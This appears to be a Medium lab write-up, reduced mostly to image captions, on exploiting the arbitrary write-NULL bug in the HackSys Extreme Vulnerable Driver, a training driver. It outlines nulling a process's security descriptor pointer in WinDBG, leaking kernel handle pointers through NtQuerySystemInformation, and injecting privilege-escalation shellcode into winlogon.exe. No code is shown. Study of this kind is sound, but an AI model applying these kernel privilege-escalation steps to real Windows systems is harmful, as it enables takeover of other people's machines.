HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

Introduction

[HEVD]-TriggerWriteNull

HEVD - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
TriggerWriteNULL function which handle kernel user-buffer, and check if it resides in ring3 (user-land).
Source-code of vulnerable driver function
Reversing Engineering vulnerable function
Placing a breakpoints on strategic addresses and running it.
Reading important addresses using WinDBG cmd
Reading important addresses using WinDBG cmd
Here, you can see the vulnerability since ebx=0x00000000 is being overwriting our value inside user-buffer eax=0xa16460cc.

DACL & Security Description

WinDBG processes list
Getting nt!_OBJECT_HEADER address from System (PID:4) process
Viewing information about System (PID:4) process header
SecurityDescription poiting to 0x8c005e1f
Visualizing SecurityDescription struct from System (PID:4) Process
SYSTEM and DAML users (colors compared to last image)
SecurityDescription poiting to 0x8c005e1f
Nullifying SecurityDescription Pointer
Results after nullification of the pointer
Maybe you don’t understand, but it’s written “Do you want close [System] Process?”
ERROR: DCOM server process launcher service terminated unexpectedly
WinDBG processes list

NtQuerySystemInformation - Handle Leaking Attack

SYSTEM_HANDLE_TABLE_ENTRY_INFO
SYSTEM_HANDLE_INFORMATION
Piece of code to leak handles data
This part will loop all handles and get his data
Script running and leaking pointers from ring3 (user-land) (PID:444)
Script running and leaking pointers from ring3 (user-land) (PID:1240)
[11931] Leaked pointers found it
WinDBG processes list
Source-code modified in order to filter only handles from “lsass.exe” PID
Source-code modified in order to filter only handles from “lsass.exe” PID
Nullifying “lsass.exe” handle pointers “SecurityDescription”, and injecting “LPE shellcode” at “winlogon.exe” process.

--

--

--

OSCP 18y | OSCE 19y | OSWE 21y | - Security Research Noob — @w4fz5uck5

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

An Imaginative, Satirical Take on TraceTogether

D’CENT Wallet is integrated with Solana SPL Tokens.

All about cross-site scripting (XSS)

How to add custom $TVA on Your Wallet…?

Detecting the Confusion !!

What’s Next in Identity and Access Management

Join The Biggest Cypherpunk NFT Giveaway

Can’t connect to this Wi-Fi network on Windows 10 — how to fix it?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
w4fz5uck5

w4fz5uck5

OSCP 18y | OSCE 19y | OSWE 21y | - Security Research Noob — @w4fz5uck5

More from Medium

How do Security Experts surf the tidal wave of security news?

Eliminating Authorization Vulnerabilities with Dacquiri

Recent Trends in Cyber Security

How to trap bots in your own honeypot